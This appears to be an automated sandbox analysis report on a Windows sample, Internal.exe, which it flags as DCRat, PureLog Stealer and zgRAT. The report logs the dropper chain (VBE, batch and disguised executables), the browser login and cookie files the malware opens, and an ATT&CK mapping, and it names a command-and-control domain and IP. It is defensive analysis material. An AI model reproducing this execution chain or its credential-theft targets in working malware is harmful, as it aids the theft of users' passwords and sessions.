                                    Source: C:\Recovery\csrss.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\csrss.exeProcess token adjusted: Debug
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess token adjusted: Debug
                                    Source: C:\Blockcomcrt\AgentMonitor.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0050B7E0 __EH_prolog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,_swprintf,_swprintf,ShellExecuteExW,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,1_2_0050B7E0
                                    Source: C:\Users\user\Desktop\Internal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Blockcomcrt\AgentMonitor.exe "C:\Blockcomcrt/AgentMonitor.exe"Jump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"Jump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"Jump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Blockcomcrt\WmiPrvSE.exe "C:\Blockcomcrt\WmiPrvSE.exe"
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.000000000359F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0050F654 cpuid 1_2_0050F654
                                    Source: C:\Blockcomcrt\AgentMonitor.exeQueries volume information: C:\Blockcomcrt\AgentMonitor.exe VolumeInformationJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeQueries volume information: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeQueries volume information: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Blockcomcrt\AgentMonitor.exeQueries volume information: C:\Blockcomcrt\AgentMonitor.exe VolumeInformation
                                    Source: C:\Blockcomcrt\AgentMonitor.exeQueries volume information: C:\Blockcomcrt\AgentMonitor.exe VolumeInformation
                                    Source: C:\Recovery\csrss.exeQueries volume information: C:\Recovery\csrss.exe VolumeInformation
                                    Source: C:\Recovery\csrss.exeQueries volume information: C:\Recovery\csrss.exe VolumeInformation
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeQueries volume information: C:\Blockcomcrt\WmiPrvSE.exe VolumeInformation
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000006.00000002.1763759179.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: AgentMonitor.exe PID: 2300, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: yxeaYbTPMzNPCanFqSswYWhX.exe PID: 4536, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: yxeaYbTPMzNPCanFqSswYWhX.exe PID: 4788, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: Internal.exe, type: SAMPLE
                                    Source: Yara matchFile source: 1.3.Internal.exe.793f2eb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.6f482eb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.AgentMonitor.exe.830000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.793f2eb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.6f482eb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000000.1708671234.0000000000832000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000001.00000003.1412731329.0000000007801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000001.00000003.1412020893.0000000006E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Blockcomcrt\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\csrss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Blockcomcrt\AgentMonitor.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: Internal.exe, type: SAMPLE
                                    Source: Yara matchFile source: 1.3.Internal.exe.793f2eb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.6f482eb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.AgentMonitor.exe.830000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.793f2eb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.6f482eb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Blockcomcrt\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\csrss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Blockcomcrt\AgentMonitor.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000006.00000002.1763759179.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: AgentMonitor.exe PID: 2300, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: yxeaYbTPMzNPCanFqSswYWhX.exe PID: 4536, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: yxeaYbTPMzNPCanFqSswYWhX.exe PID: 4788, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: Internal.exe, type: SAMPLE
                                    Source: Yara matchFile source: 1.3.Internal.exe.793f2eb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.6f482eb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.AgentMonitor.exe.830000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.793f2eb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.6f482eb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000000.1708671234.0000000000832000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000001.00000003.1412731329.0000000007801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000001.00000003.1412020893.0000000006E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Blockcomcrt\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\csrss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Blockcomcrt\AgentMonitor.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: Internal.exe, type: SAMPLE
                                    Source: Yara matchFile source: 1.3.Internal.exe.793f2eb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.6f482eb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.AgentMonitor.exe.830000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.793f2eb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.Internal.exe.6f482eb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Blockcomcrt\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\csrss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Blockcomcrt\AgentMonitor.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts241
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    Exploitation for Privilege Escalation                                    		1
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		3
                                    File and Directory Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory145
                                    System Information Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		12
                                    Process Injection                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager541
                                    Security Software Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCron21
                                    Registry Run Keys / Startup Folder                                    		1
                                    Scheduled Task/Job                                    		14
                                    Software Packing                                    		NTDS2
                                    Process Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                                    Registry Run Keys / Startup Folder                                    		1
                                    DLL Side-Loading                                    		LSA Secrets471
                                    Virtualization/Sandbox Evasion                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion                                    		Cached Domain Credentials1
                                    Application Window Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                                    Masquerading                                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job471
                                    Virtualization/Sandbox Evasion                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                    Process Injection                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1498678 Sample: Internal.exe Startdate: 25/08/2024 Architecture: WINDOWS Score: 100 84 373292cm.nyashka.top 2->84 88 Multi AV Scanner detection for domain / URL 2->88 90 Suricata IDS alerts for network traffic 2->90 92 Found malware configuration 2->92 94 19 other signatures 2->94 11 Internal.exe 3 6 2->11         started        15 yxeaYbTPMzNPCanFqSswYWhX.exe 14 56 2->15         started        18 csrss.exe 2->18         started        20 4 other processes 2->20 signatures3 process4 dnsIp5 64 C:\Blockcomcrt\AgentMonitor.exe, PE32 11->64 dropped 66 spG4AUp7NlO1gWWyb8...s0mKYH4wJzJCIrd.vbe, data 11->66 dropped 106 Detected unpacking (changes PE section rights) 11->106 108 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->108 110 Hides threads from debuggers 11->110 22 wscript.exe 1 11->22         started        86 373292cm.nyashka.top 80.211.144.156, 49707, 49708, 49711 ARUBA-ASNIT Italy 15->86 68 C:\Users\user\Desktop\mVSSSdRf.log, PE32 15->68 dropped 70 C:\Users\user\Desktop\bQCMLIKB.log, PE32 15->70 dropped 72 C:\Users\user\Desktop\ZcxEZvOD.log, PE32 15->72 dropped 74 2 other malicious files 15->74 dropped 112 Tries to harvest and steal browser information (history, passwords, etc) 15->112 114 Antivirus detection for dropped file 18->114 116 Multi AV Scanner detection for dropped file 18->116 118 Machine Learning detection for dropped file 18->118 file6 signatures7 process8 signatures9 98 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->98 25 cmd.exe 1 22->25         started        process10 process11 27 AgentMonitor.exe 10 34 25->27         started        31 conhost.exe 25->31         started        file12 76 C:\Users\user\Desktop\wekqfedd.log, PE32 27->76 dropped 78 C:\Users\user\Desktop\fXTLLrxO.log, PE32 27->78 dropped 80 C:\Users\user\Desktop\cQVCqZDT.log, PE32 27->80 dropped 82 9 other malicious files 27->82 dropped 120 Antivirus detection for dropped file 27->120 122 Multi AV Scanner detection for dropped file 27->122 124 Creates an undocumented autostart registry key 27->124 126 5 other signatures 27->126 33 cmd.exe 27->33         started        35 csc.exe 4 27->35         started        39 csc.exe 4 27->39         started        41 18 other processes 27->41 signatures13 process14 file15 43 WmiPrvSE.exe 33->43         started        46 conhost.exe 33->46         started        48 chcp.com 33->48         started        50 w32tm.exe 33->50         started        60 C:\Program Files (x86)\...\msedge.exe, PE32 35->60 dropped 96 Infects executable files (exe, dll, sys, html) 35->96 52 conhost.exe 35->52         started        54 cvtres.exe 1 35->54         started        62 C:\Windows\...\SecurityHealthSystray.exe, PE32 39->62 dropped 56 conhost.exe 39->56         started        58 cvtres.exe 1 39->58         started        signatures16 process17 signatures18 100 Antivirus detection for dropped file 43->100 102 Multi AV Scanner detection for dropped file 43->102 104 Machine Learning detection for dropped file 43->104

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    Internal.exe68%VirustotalBrowse
                                    Internal.exe76%ReversingLabsWin32.Trojan.DCRat
                                    Internal.exe100%AviraVBS/Runner.VPG
                                    Internal.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe100%AviraHEUR/AGEN.1323342
                                    C:\Blockcomcrt\WmiPrvSE.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\fXTLLrxO.log100%AviraHEUR/AGEN.1300079
                                    C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\wekqfedd.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\Desktop\mVSSSdRf.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\bQCMLIKB.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Recovery\csrss.exe100%AviraHEUR/AGEN.1323342
                                    C:\Blockcomcrt\AgentMonitor.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\RypOpByW.log100%Joe Sandbox ML
                                    C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\UjoVbfCg.log100%Joe Sandbox ML
                                    C:\Blockcomcrt\WmiPrvSE.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\wekqfedd.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\mVSSSdRf.log100%Joe Sandbox ML
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe100%Joe Sandbox ML
                                    C:\Recovery\csrss.exe100%Joe Sandbox ML
                                    C:\Blockcomcrt\AgentMonitor.exe100%Joe Sandbox ML
                                    C:\Blockcomcrt\AgentMonitor.exe88%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Blockcomcrt\AgentMonitor.exe55%VirustotalBrowse
                                    C:\Blockcomcrt\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Blockcomcrt\WmiPrvSE.exe55%VirustotalBrowse
